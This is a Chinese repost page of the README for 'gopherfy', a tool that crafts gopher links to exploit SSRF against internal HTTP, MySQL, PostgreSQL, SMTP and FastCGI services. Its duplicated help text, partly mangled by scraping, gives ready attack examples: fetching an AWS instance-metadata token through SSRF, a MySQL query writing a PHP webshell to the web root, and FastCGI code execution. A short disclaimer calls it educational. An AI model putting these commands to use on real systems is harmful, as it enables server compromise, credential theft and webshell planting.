gopherfy

其他类别 2025-08-18

gopherfy

生成用于利用SSRF的Gopher链接的工具

 curl http://exa*mple.**org/ssrf/vuln/proxy?url=$(gopherfy mysql -e url -q "show databases;")

配x这是出于教育目的。不要在直播服务器上尝试!

如何使用

gopherfy [command] Available Commands: completion Generate the autocompletion script for the specified shell fastcgi Generate fastcgi gopher link help Help about any command http Generate http gopher link mysql Generate mysql gopher link postgres Generate postgres gopher link smtp Generate smtp gopher link Flags: -e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none") -h, --help help for gopherfy --send send the selector string -v, --version version for gopherfy Use " gopherfy [command] --help" for more information about a command.">
 Tool to generate gopher links for exploiting SSRF

Usage:
  gopherfy [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  fastcgi     Generate fastcgi gopher link
  help        Help about any command
  http        Generate http gopher link
  mysql       Generate mysql gopher link
  postgres    Generate postgres gopher link
  smtp        Generate smtp gopher link

Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
  -h, --help             help for gopherfy
      --send             send the selector string
  -v, --version          version for gopherfy

Use " gopherfy [command] --help" for more information about a command.

fastcgi

gopherfy fastcgi [flags] Flags: -a, --addr string fastcgi address (default "127.0.0.1:9000") -c, --code string code to execute (default "") -f, --file string absolute php file path (default "/usr/local/lib/php/System.php") -h, --help help for fastcgi Global Flags: -e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none") --send send the selector string">
 Generate fastcgi gopher link

Usage:
  gopherfy fastcgi [flags]

Flags:
  -a, --addr string   fastcgi address (default "127.0.0.1:9000")
  -c, --code string   code to execute (default "")
  -f, --file string   absolute php file path (default "/usr/local/lib/php/System.php")
  -h, --help          help for fastcgi

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string

http

gopherfy http [flags] Examples: gopherfy http -a 169.254.169.254:80 -p /latest/api/token -X PUT -H X-aws-ec2-metadata-token-ttl-seconds=21600 Flags: -a, --addr string http address (default "127.0.0.1:80") -H, --header stringToString http header value (key=value) (default []) -h, --help help for http -V, --http-version string http protocol version (default "HTTP/1.0") -p, --path string http path (default "/") -X, --request string http request method (default "GET") -A, --user-agent string http user agent (default " gopherfy ") Global Flags: -e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none") --send send the selector string">
 Generate http gopher link

Usage:
  gopherfy http [flags]

Examples:
gopherfy http -a 169.254.169.254:80 -p /latest/api/token -X PUT -H X-aws-ec2-metadata-token-ttl-seconds=21600

Flags:
  -a, --addr string             http address (default "127.0.0.1:80")
  -H, --header stringToString   http header value (key=value) (default [])
  -h, --help                    help for http
  -V, --http-version string     http protocol version (default "HTTP/1.0")
  -p, --path string             http path (default "/")
  -X, --request string          http request method (default "GET")
  -A, --user-agent string       http user agent (default " gopherfy ")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string

mysql

gopherfy mysql [flags] Examples: gopherfy mysql -q "SELECT '' INTO OUTFILE '/var/www/html/shell.php'" Flags: -a, --addr string mysql address (default "127.0.0.1:3306") -d, --db string mysql database name -h, --help help for mysql -q, --query string mysql query -u, --user string mysql username (default "root") Global Flags: -e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none") --send send the selector string">
 Generate mysql gopher link

Usage:
  gopherfy mysql [flags]

Examples:
gopherfy mysql -q "SELECT '' INTO OUTFILE '/var/www/html/shell.php'"

Flags:
  -a, --addr string    mysql address (default "127.0.0.1:3306")
  -d, --db string      mysql database name
  -h, --help           help for mysql
  -q, --query string   mysql query
  -u, --user string    mysql username (default "root")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string

Postgresql

gopherfy postgres [flags] Flags: -a, --addr string postgres address (default "127.0.0.1:5432") -d, --db string postgres database name -h, --help help for postgres -q, --query string postgres query -u, --user string postgres username (default "postgres") Global Flags: -e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none") --send send the selector string">
 Generate postgres gopher link

Usage:
  gopherfy postgres [flags]

Flags:
  -a, --addr string    postgres address (default "127.0.0.1:5432")
  -d, --db string      postgres database name
  -h, --help           help for postgres
  -q, --query string   postgres query
  -u, --user string    postgres username (default "postgres")

Global Flags:
  -e, --encoder string   the encoder to use. allowed: "base64", "url" or "none" (default "none")
      --send             send the selector string

执照

麻省理工学院

下载源码

通过命令行克隆项目:

git clone https://github.com/hupe1980/gopherfy.git

相关文章

gofcgid

2025-08-18

irma

2025-08-18

sesimos

2025-08-18

deno_fcgi

2025-08-18

推荐阅读

向上:银河游戏免安装正式版

2026-01-23

风暴驭使正式中文版

2026-01-23

冥河:贪婪之刃中文试玩版

2026-01-23

超级键盘侠免安装绿色中文版

2026-01-23